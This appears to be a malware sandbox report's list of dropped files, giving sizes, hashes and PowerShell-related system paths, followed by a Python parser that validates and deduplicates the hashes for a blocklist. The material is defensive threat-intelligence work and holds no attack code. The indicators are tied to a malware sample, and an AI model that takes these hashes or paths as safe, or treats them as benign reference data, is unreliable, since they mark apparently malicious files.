da0a05b2b8d269fb73558dfcf0ed5c167f6d3877
SHA256
4191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862
SHA512
6afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf
-
Filesize
1.9MB
MD5
f67d08e8c02574cbc2f1122c53bfb976
SHA1
6522992957e7e4d074947cad63189f308a80fcf2
SHA256
c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e
SHA512
2e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5
-
Filesize
1.0MB
MD5
dbf4f8dcefb8056dc6bae4b67ff810ce
SHA1
bbac1dd8a07c6069415c04b62747d794736d0689
SHA256
47b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68
SHA512
b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1
-
Filesize
2KB
MD5
d85ba6ff808d9e5444a4b369f5bc2730
SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5
cadef9abd087803c630df65264a6c81c
SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
Filesize
8KB
MD5
b2b629186c5177f619378848dfe9c7f2
SHA1
1c96393b43fdb82f8a6655b3711ac32f4b330e27
SHA256
aaf7db084f8ce612e8c8f808d1b26e1c3c07db599522d54079998fa9aac4a584
SHA512
264d7b090d58483282c9891b0048aea038ad29b1d079761483075319152f9323aef2e10f877fc8418c54307628e721865e73524a54e57a20f340d95b4d2f4afd
-
Filesize
8KB
MD5
25a2ad3c64e0d956603778cdb7a3d01b
SHA1
886cc2ff6b811a3bcd7e35ad0b89087a52025375
SHA256
7efd93bcf12bbdc613f305a5772544b280ccdc07a1f7cb2b2cd919a91537d3e1
SHA512
ff249d0734afe4b43a7507e203605e21428fd4c441614d57454b953857f6dbff4d532a1581d068eb0f99382a748dc85c41a4ec50788ba168bd1d6e0270d7261b
-
Filesize
512KB
MD5
2dc7c15cdaf642f9e6b26fea3820db1c
SHA1
cf116c5b98c7acbcf3b1cca42ee0d96e305f3836
SHA256
49f19925467819687cf04a81188ff7864ea476fc661d44c316bf38a52c65c1bd
SHA512
5d201b8b9c0119fad200022a4c178a6fae5cc6c5d7e0cee0090160883e88d737bf9b3a9685b3ba0a790df1e5be0aa7381f9739946732703c25376dadf8e0696a
-
Filesize
512KB
MD5
2dc7c15cdaf642f9e6b26fea3820db1c
SHA1
cf116c5b98c7acbcf3b1cca42ee0d96e305f3836
SHA256
49f19925467819687cf04a81188ff7864ea476fc661d44c316bf38a52c65c1bd
SHA512
5d201b8b9c0119fad200022a4c178a6fae5cc6c5d7e0cee0090160883e88d737bf9b3a9685b3ba0a790df1e5be0aa7381f9739946732703c25376dadf8e0696a
-
Filesize
14.0MB
MD5
4a522b4d22657f11163f0fcedf024c6d
SHA1
a437a2c810be90992276deb31ed02b8c82d0b15c
SHA256
c5e901f66e48e18a283a94c9253d35e276513194db3d2d289dc929b254378936
SHA512
aaf4bb64bd088be8439e6d40f69b1573b5c60b3998d2a5b118ccee12f1ddec9efc3cc3add256d41d5ddd989907f528d23a6791da5ed17b2ccfe19d303ab8cbe4
-
Filesize
14.0MB
MD5
4a522b4d22657f11163f0fcedf024c6d
SHA1
a437a2c810be90992276deb31ed02b8c82d0b15c
SHA256
c5e901f66e48e18a283a94c9253d35e276513194db3d2d289dc929b254378936
SHA512
aaf4bb64bd088be8439e6d40f69b1573b5c60b3998d2a5b118ccee12f1ddec9efc3cc3add256d41d5ddd989907f528d23a6791da5ed17b2ccfe19d303ab8cbe4
-
Filesize
16KB
MD5
603bb73a3283a85271e41318a3ea77dc
SHA1
2168503e317070defc5858a74cb6162a45add57e
SHA256
e404bc748bdbbf5ba3731066b1aed41732ca2f3c3b946cc31665674ed1d61c93
SHA512
733a31dfa14012d65b58db3dca917453dc59dae970d4b93be9d5ce4050d3167bc6944c81c14f85a77a6e429c57ced9952bd10e20bba19d04e0b2865843205354
-
Filesize
16KB
MD5
413191f15fca983f439f87f41706f5c5
SHA1
8e237dad87e5f4bd9a935ff17635fb4f71cb7e94
SHA256
7ff3ae4ac6a2a6e84be988c3aa71fcaf89803c3b8c2e4f053ffbd207e684e2da
SHA512
00171cea0b4f7e2e635ec1527b405470f6436fbde14341fa721b44c5ca28aaf64bafd296ab0730624fe531ecd22103c6d9fef106098849d76ecf91dab074dddc
-
Filesize
5.1MB
MD5
2438b851e157a3f70bd48af1984b2139
SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
Filesize
5.1MB
MD5
2438b851e157a3f70bd48af1984b2139
SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB
MD5
556084f2c6d459c116a69d6fedcc4105
SHA1
633e89b9a1e77942d822d14de6708430a3944dbc
SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB
MD5
8e7a623fcc311b5017c82b1181911569
SHA1
048d36afc6481760c53cff348c05744d98f3cce7
SHA256
9d5367afff64011b621c73c310c4b8bda206ec02726aadc0b17572d90888b25d
SHA512
3848945ad50086a6af42f9640bcebf3fecac3d8a6f2012eeb786a2def1a68f94848350bfec9115687b98f4e0bba643e807fbf1efd715d676e0d634f158e5d231
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB
MD5
20529297778890e4f2947a985a6441a9
SHA1
1f1b79d148e4b9f7df376211c0da9657b724b0fe
SHA256
420c6ef17d53b54048806fb323150923c5e3897969251d7165d698370a4a6e43
SHA512
3dfcd80c51f1e5372077ac33c3e9798a6ee85c766edfea9eb701ca9d679cc8b2fe0e77f68d4ff81ab992437a6b8d4c9b7bc3280fca62c5626819f52f516e8a61
-
Filesize
3KB
MD5
e546b81f1a1a1b753a4f6d3455394dec
SHA1
14f407db119dd97ed248be2a8d15a09ba938987a
SHA256
1100d55448340b1a23c243209beb3aa1035a45912c346c00afb41181d9798de8
SHA512
03f12755ae8c165323b2562b620731217b9f55affe782e6e07540131065b2edf5c465b5440d6b08c7a1a3d8541e423e8c9919ca768f72f830bc211bceb7fccfe
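The Downloads list above is the report's dropped-file evidence: one entry per "-" separator, a path for some entries, a rounded Filesize, and four digests whose labels the extraction sometimes fused to their values ("MD52438..."). Before these go into a blocklist they need to be parsed, checked for shape, and deduplicated: the 5.1MB file appears four times with identical digests, and the two 512KB and two 14.0MB entries are likewise repeats. The parser below is an added example and not part of the Triage page. It handles both the fused and the split label layouts, rejects any digest that is not lowercase hex of the expected length, and collapses repeats by SHA256 rather than by size, since the Filesize column is rounded and is not a safe key. The embedded text is a constructed sample transcribed from three of the entries.

```python
import re
from collections import Counter

# Expected hex digest length per label.
HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# A label may be fused with its value ("MD52438...") or stand alone on its line.
# Longer SHA labels are listed first so "SHA256..." is not read as "SHA1".
LABEL_RE = re.compile(r"^(Filesize|MD5|SHA512|SHA256|SHA1)\s*(.*)$")
HEX_RE = re.compile(r"^[0-9a-f]+$")

# Constructed sample: three entries transcribed from the Downloads list of this
# report, in both the fused and the split label layouts the extraction produced.
SAMPLE = r"""
-
Filesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
Filesize
5.1MB
MD5
2438b851e157a3f70bd48af1984b2139
SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
"""


def parse_downloads(text):
    """Group the label/value lines into one dict per '-'-separated entry."""
    records, current, pending = [], {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "-":
            if current:
                records.append(current)
            current, pending = {}, None
            continue
        if pending is not None:          # value for the label on the previous line
            current[pending] = line.lower() if pending in HASH_LENGTHS else line
            pending = None
            continue
        m = LABEL_RE.match(line)
        if m is None:
            current["path"] = line       # a dropped-file path precedes its Filesize
            continue
        label, value = m.group(1), m.group(2).strip()
        if value:
            current[label] = value.lower() if label in HASH_LENGTHS else value
        else:
            pending = label              # value is on the next line
    if current:
        records.append(current)
    return records


def validate(record):
    """Return the list of problems with a record's digests (empty if clean)."""
    problems = []
    for label, length in HASH_LENGTHS.items():
        value = record.get(label)
        if value is None:
            problems.append(f"missing {label}")
        elif len(value) != length or not HEX_RE.match(value):
            problems.append(f"malformed {label}")
    return problems


def unique_by_sha256(records):
    """Collapse repeated entries; Filesize is rounded, so key on SHA256 only."""
    counts = Counter(r["SHA256"] for r in records)
    unique = {}
    for r in records:
        unique.setdefault(r["SHA256"], r)
    return list(unique.values()), counts


if __name__ == "__main__":
    parsed = parse_downloads(SAMPLE)
    for rec in parsed:
        print(rec.get("path", "<no path>"), rec["Filesize"], validate(rec) or "ok")
    uniq, counts = unique_by_sha256(parsed)
    print(len(parsed), "entries,", len(uniq), "unique by SHA256")
```

Run against the full list on this page the same code yields one record per entry with the repeats folded into their SHA256 counts; a record that fails validate should be dropped rather than loaded, since a truncated digest in a blocklist silently matches nothing.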